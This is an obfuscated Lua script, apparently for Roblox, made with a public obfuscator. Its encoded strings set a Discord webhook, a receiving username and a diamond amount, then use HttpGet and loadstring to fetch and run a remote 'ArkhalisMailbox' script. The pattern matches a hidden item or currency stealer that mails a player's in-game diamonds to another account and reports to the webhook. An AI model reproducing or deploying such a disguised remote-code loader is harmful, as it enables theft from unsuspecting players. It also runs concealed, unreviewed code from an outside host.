--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (1==v18) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==0) then v85=(v31/((5 -3)^(v32-1)))%(((1640 -(1523 + 114)) -1)^(((v33-(2 -(1 + 0))) -(v32-((883 -263) -(555 + 64)))) + 1)) ;return v85-(v85%(932 -(857 + 74))) ;end end else local v86=568 -(367 + 201) ;local v87;while true do if (v86==(927 -(214 + 713))) then v87=(1 + 1)^(v32-1) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (877 -(282 + 595)) ;end end end end v22=nil;v18=2;end if (7==v18) then function v30(v34,v35,v36)local v37=v34[1];local v38=v34[2];local v39=v34[3];return function(...)local v66=v37;local v67=v38;local v68=v39;local v69=v28;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v88=0,v74 do if (v88>=v68) then v72[v88-v68 ]=v73[v88 + 1 ];else v76[v88]=v73[v88 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v89=0;while true do if (v89==1) then if (v79<=5) then if (v79<=2) then if (v79<=0) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79>1) then v76[v78[2]][v78[3]]=v78[4];else v76[v78[2]]=v36[v78[3]];end elseif (v79<=3) then do return;end elseif (v79==4) then local v120=v78[2];local v121=v76[v78[3]];v76[v120 + 1 ]=v121;v76[v120]=v121[v78[4]];else local v125=v78[2];v76[v125]=v76[v125](v13(v76,v125 + 1 ,v71));end elseif (v79<=8) then if (v79<=6) then v76[v78[2]][v78[3]]=v78[4];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v36[v78[3]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]][v78[3]]=v78[4];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v70=v78[3];elseif (v79==7) then v76[v78[2]]=v78[3];else v76[v78[2]]();end elseif (v79<=9) then v70=v78[3];elseif (v79==10) then local v129;local v130,v131;local v132;local v133;v76[v78[2]][v78[3]]=v78[4];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v36[v78[3]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v36[v78[3]];v70=v70 + 1 ;v78=v66[v70];v133=v78[2];v132=v76[v78[3]];v76[v133 + 1 ]=v132;v76[v133]=v132[v78[4]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v133=v78[2];v130,v131=v69(v76[v133](v13(v76,v133 + 1 ,v78[3])));v71=(v131 + v133) -1 ;v129=0;for v160=v133,v71 do v129=v129 + 1 ;v76[v160]=v130[v129];end v70=v70 + 1 ;v78=v66[v70];v133=v78[2];v76[v133]=v76[v133](v13(v76,v133 + 1 ,v71));v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]();v70=v70 + 1 ;v78=v66[v70];v70=v78[3];else local v145=v78[2];local v146,v147=v69(v76[v145](v13(v76,v145 + 1 ,v78[3])));v71=(v147 + v145) -1 ;local v148=0;for v163=v145,v71 do local v164=0;while true do if (v164==0) then v148=v148 + 1 ;v76[v163]=v146[v148];break;end end end end v70=v70 + 1 ;break;end if (v89==0) then v78=v66[v70];v79=v78[1];v89=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==4) then function v25()local v40=v24();local v41=v24();local v42=1066 -((506 -(145 + 293)) + 997) ;local v43=(v21(v41,1271 -(226 + 1044) ,(517 -(44 + 386)) -67 ) * ((3 -1)^(149 -(32 + 85)))) + v40 ;local v44=v21(v41,21 + 0 ,1517 -(998 + 488) );local v45=((v21(v41,32)==(2 -1)) and  -(1 + 0)) or (1 + 0) ;if (v44==(1187 -(1069 + 38 + 80))) then if (v43==(957 -(892 + 65))) then return v45 * (0 -(0 + 0)) ;else local v96=0 -(772 -(201 + 571)) ;while true do if (v96==(0 -0)) then v44=1 -(1138 -(116 + 1022)) ;v42=350 -(87 + 263) ;break;end end end elseif (v44==(2227 -((278 -211) + 113))) then return ((v43==(0 + 0 + 0)) and (v45 * ((3 -2)/(442 -(416 + 26))))) or (v45 * NaN) ;end return v8(v45,v44-(2511 -1488) ) * (v42 + (v43/((2 + 0)^(206 -154)))) ;end v26=nil;function v26(v46)local v47;if  not v46 then v46=v24();if (v46==(0 -0)) then return "";end end v47=v3(v16,v19,(v19 + v46) -(3 -2) );v19=v19 + v46 ;local v48={};for v80=860 -(814 + 45) , #v47 do v48[v80]=v2(v1(v3(v47,v80,v80)));end return v6(v48);end v18=5;end if (v18==6) then v29=nil;function v29()local v49=0 -0 ;local v50;local v51;local v52;local v53;local v54;local v55;while true do local v82=0;local v83;while true do if (v82==(74 -(71 + 3))) then v83=0 + 0 ;while true do if (v83==(0 -0)) then local v101=0 -0 ;while true do if (v101~=0) then else if (v49==3) then local v112=0;while true do if (v112~=(241 -(187 + 54))) then else local v165=0;while true do if (v165==0) then for v171=781 -(162 + 618) ,v24() do v51[v171-1 ]=v29();end return v53;end end end end end if (v49==(0 + 0)) then local v113=0 + 0 ;while true do if (v113==0) then v50={};v51={};v113=1 -0 ;end if (v113~=(1 -0)) then else v52={};v49=1 + 0 ;break;end end end v101=1;end if (v101~=(1637 -(1373 + 263))) then else v83=1;break;end end end if ((1001 -(451 + 549))==v83) then if (v49==(1 + 1)) then local v102=0 -0 ;while true do if (v102==(1 -0)) then for v149=1385 -(746 + 638) ,v24() do local v150=0 + 0 ;local v151;local v152;local v153;while true do if ((0 -0)==v150) then local v167=0;while true do if (v167~=(341 -(218 + 123))) then else v151=0;v152=nil;v167=1582 -(1535 + 46) ;end if (v167==1) then v150=1 + 0 ;break;end end end if (v150~=(1 + 0)) then else v153=nil;while true do if (v151==(561 -(306 + 254))) then while true do if (v152~=(0 + 0)) then else v153=v22();if (v21(v153,1 -0 ,1)~=(1467 -(899 + 568))) then else local v178=0 + 0 ;local v179;local v180;local v181;local v182;local v183;while true do if (2==v178) then v183=nil;while true do if (v179==2) then while true do if (v180~=3) then else if (v21(v182,3,3)==(2 -1)) then v183[4]=v55[v183[4]];end v50[v149]=v183;break;end if (v180==(603 -(268 + 335))) then local v188=290 -(60 + 230) ;while true do if (1==v188) then v180=573 -(426 + 146) ;break;end if ((0 + 0)~=v188) then else v181=v21(v153,1458 -(282 + 1174) ,3);v182=v21(v153,815 -(569 + 242) ,17 -11 );v188=1;end end end if (v180==(1 + 0)) then local v189=1024 -(706 + 318) ;while true do if (v189==(1252 -(721 + 530))) then v180=2;break;end if (v189~=(1271 -(945 + 326))) then else v183={v23(),v23(),nil,nil};if (v181==(700 -(271 + 429))) then local v197=0 + 0 ;local v198;while true do if ((1500 -(1408 + 92))==v197) then v198=0;while true do if (v198~=0) then else v183[1089 -(461 + 625) ]=v23();v183[4]=v23();break;end end break;end end elseif (v181==(1289 -(993 + 295))) then v183[3]=v24();elseif (v181==(1 + 1)) then v183[3]=v24() -(2^16) ;elseif (v181~=3) then else local v203=1171 -(418 + 753) ;while true do if (v203==(0 + 0)) then v183[1 + 2 ]=v24() -(2^(5 + 11)) ;v183[2 + 2 ]=v23();break;end end end v189=1;end end end if (v180==(531 -(406 + 123))) then if (v21(v182,1,1770 -(1749 + 20) )~=1) then else v183[1 + 1 ]=v55[v183[2]];end if (v21(v182,1324 -(1249 + 73) ,2)==(1 + 0)) then v183[3]=v55[v183[1148 -(466 + 679) ]];end v180=6 -3 ;end end break;end if (v179~=(2 -1)) then else local v184=0;while true do if (v184==0) then v182=nil;v183=nil;v184=1;end if (v184==(1901 -(106 + 1794))) then v179=1 + 1 ;break;end end end if ((0 + 0)~=v179) then else local v185=0 -0 ;while true do if (v185==1) then v179=2 -1 ;break;end if (v185~=0) then else v180=0;v181=nil;v185=1;end end end end break;end if (v178==(114 -(4 + 110))) then v179=584 -(57 + 527) ;v180=nil;v178=1428 -(41 + 1386) ;end if (v178==(104 -(17 + 86))) then v181=nil;v182=nil;v178=2;end end end break;end end break;end if (v151~=(0 + 0)) then else v152=0;v153=nil;v151=1 -0 ;end end break;end end end v49=3;break;end if (v102~=0) then else for v154=1,v54 do local v155=0;local v156;local v157;local v158;local v159;while true do if (v155~=(2 -1)) then else local v168=0;while true do if (v168==(167 -(122 + 44))) then v155=2;break;end if ((0 -0)==v168) then v158=nil;v159=nil;v168=1;end end end if (v155~=0) then else v156=0;v157=nil;v155=1;end if (v155==2) then while true do if (v156==0) then local v173=0 -0 ;while true do if ((1 + 0)~=v173) then else v156=1 + 0 ;break;end if ((0 -0)~=v173) then else v157=0;v158=nil;v173=1;end end end if (v156~=(66 -(30 + 35))) then else v159=nil;while true do if (v157==(1 + 0)) then if (v158==1) then v159=v22()~=(1257 -(1043 + 214)) ;elseif (v158==(7 -5)) then v159=v25();elseif (v158~=3) then else v159=v26();end v55[v154]=v159;break;end if (v157==(1212 -(323 + 889))) then local v175=0 -0 ;local v176;local v177;while true do if (v175==1) then while true do if (v176==(580 -(361 + 219))) then v177=320 -(53 + 267) ;while true do if ((0 + 0)==v177) then local v186=0;while true do if (v186==0) then local v190=0;while true do if (v190==(414 -(15 + 398))) then v186=1;break;end if (v190==(982 -(18 + 964))) then v158=v22();v159=nil;v190=3 -2 ;end end end if (v186==(1 + 0)) then v177=1;break;end end end if (1==v177) then v157=1;break;end end break;end end break;end if (v175~=(0 + 0)) then else v176=0;v177=nil;v175=1;end end end end break;end end break;end end end v53[853 -(20 + 830) ]=v22();v102=1;end end end if (v49==(1 + 0)) then local v103=126 -(116 + 10) ;local v104;while true do if (v103==(0 + 0)) then v104=738 -(542 + 196) ;while true do if (v104~=(0 -0)) then else local v166=0 + 0 ;while true do if (v166~=1) then else v104=1 + 0 ;break;end if (v166~=(0 + 0)) then else v53={v50,v51,nil,v52};v54=v24();v166=3 -2 ;end end end if (v104==1) then v55={};v49=2;break;end end break;end end end break;end end break;end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v56)if (v1(v56,2)==79) then local v90=0;while true do if (v90==0) then v20=v0(v3(v56,1,1));return "";end end else local v91=v2(v0(v56,16));if v20 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v91,v20);v20=nil;v97=1;end end else return v91;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v57=1121 -(118 + 995 + 8) ;local v58;local v59;local v60;local v61;while true do if (v57==1) then return (v61 * ((28587208 + 20510156) -32320148)) + (v60 * (65913 -(126 + 16 + 235))) + (v59 * (109 + 147)) + v58 ;end if (v57==(0 -0)) then v58,v59,v60,v61=v1(v16,v19,v19 + 1 + 2 );v19=v19 + (981 -(553 + 243 + 181)) ;v57=1 -0 ;end end end v25=nil;v18=4;end if (v18==2) then function v22()local v62=v1(v16,v19,v19);v19=v19 + 1 ;return v62;end v23=nil;function v23()local v63=0 -0 ;local v64;local v65;while true do if (v63==((0 + 0) -0)) then v64,v65=v1(v16,v19,v19 + ((1333 -(797 + 532)) -2) );v19=v19 + 1 + 1 ;v63=4 -3 ;end if (v63==1) then return (v65 * (1009 -(239 + 514))) + v64 ;end end end v18=3;end end end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130373831353835303639353734313436302F4D344F423534694C576E50584E4D2D74574D46336D672O445356433456646E425348797635504F4A4F3538527A457864704B774C2O72382O567A4C70374F576276664847030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756103083O00557365726E616D6503133O004F2O46494349414C5F48616E616E313233343503083O004469616D6F6E6473024O0080841E4100163O0012073O00013O00264O000D000100020004093O000D0001001201000100033O00300A00010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O0015000100264O0001000100010004093O00010001001201000100033O0030060001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00033O00017O00",v9(),...);end